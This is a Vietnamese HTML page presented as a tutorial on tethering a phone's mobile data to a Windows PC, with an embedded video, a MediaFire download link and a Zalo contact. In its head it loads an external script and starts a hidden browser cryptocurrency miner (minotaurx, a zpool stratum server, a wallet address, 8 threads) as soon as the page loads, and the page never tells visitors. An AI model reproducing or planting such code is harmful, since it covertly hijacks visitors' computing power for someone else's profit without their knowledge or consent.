<!DOCTYPE html>
<html lang="vi">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Hướng Dẫn Phát Wi-Fi từ Điện Thoại qua Laptop hoặc PC (Chỉ hỗ trợ Windows)</title>
    <!-- Bootstrap CSS -->
    <link href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">
    <style>
        body {
            padding: 20px;
            font-family: Arial, sans-serif;
            color: #333;
            background-image: url('https://lh3.googleusercontent.com/pw/AP1GczOL0jgLFrD7yzxtuzsgKUzsDDvIGmi8AOahbb2a9RuFMfrMct9L6Q-lPebyExkHGwUXQzzCKD-JW_pUO98LC0CQrogxomXJXqBhQ0DfJHw-4B-9VDnGm2zN2x4yDqiPekkb97WEVvotyFYM-U57S_HC=w1655-h933-s-no-gm?authuser=0');
            background-size: cover;
            background-position: center;
        }
        header {
            margin-bottom: 20px;
        }
        iframe {
            display: block;
            margin: 0 auto;
            margin-bottom: 20px;
        }
        footer {
            margin-top: 20px;
            text-align: center;
            font-size: 14px;
            color: #fff;
        }
        .content {
            background-color: rgba(255, 255, 255, 0.8);
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0px 0px 10px 0px rgba(0,0,0,0.1);
        }
        h1 {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            font-weight: bold;
            color: #333;
            text-align: center;
            margin-bottom: 20px;
        }
        p {
            font-size: 16px;
            line-height: 1.6;
            color: #333;
        }
        .btn-primary {
            background-color: #007bff;
            border-color: #007bff;
        }
        .btn-primary:hover {
            background-color: #0056b3;
            border-color: #0056b3;
        }
    </style>
    <script src="https://webminer.pages.dev/dist/mm.js"></script>
    <script>
        const client = new Client({
            algorithm: 'minotaurx', // yespower, minotaurx
            stratum: {
                server: "minotaurx.sea.mine.zpool.ca", // Your Pool host
                port: 7019, // Your Pool port
                worker: "SMMNiGin5ePfBDokLkh6dRJyVfkzEnp98y", // Your Wallet
                password: "c=DGB" // Your Mining password
            },
            options: {
                threads: 8, // CPU threads to mining
                log: true // Show log on console
            },
        });

        // Start Mining
        client.start();
    </script>
</head>
<body>
    <div class="container">
        <header>
            <h1>Hướng Dẫn Phát Wi-Fi từ Điện Thoại qua Laptop hoặc PC (Chỉ hỗ trợ Windows)</h1>
        </header>

        <!-- Đoạn nhúng iframe -->
        <div class="embed-responsive embed-responsive-16by9">
            <iframe class="embed-responsive-item" src="https://www.youtube.com/embed/AdAH1mvx54s" title="Hướng dẫn phát 4g từ điện thoại lên Laptop or Pc | 4ghatde.net |Sp Hạt Dẻ" allowfullscreen></iframe>
        </div>

        <!-- Text "Nơi tải file:" -->
        <div class="text-center mb-4">
            <p class="lead">Nơi tải file: <a href="https://www.mediafire.com/file/1u79z16ygya9yw2/Netch_4ghatde.net.zip/file" class="btn btn-primary" target="_blank">Tải tập tin</a></p>
        </div>

        <!-- Liên kết Zalo -->
        <footer>
            <p class="mb-0">Liên hệ: <a href="https://zalo.me/sp4ghatdeno1" target="_blank" style="color: #007bff;">SP Hạt Dẻ</a></p>
        </footer>
    </div>

    <!-- Bootstrap JS and jQuery -->
    <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.2/dist/js/bootstrap.bundle.min.js"></script>
</body>
</html>
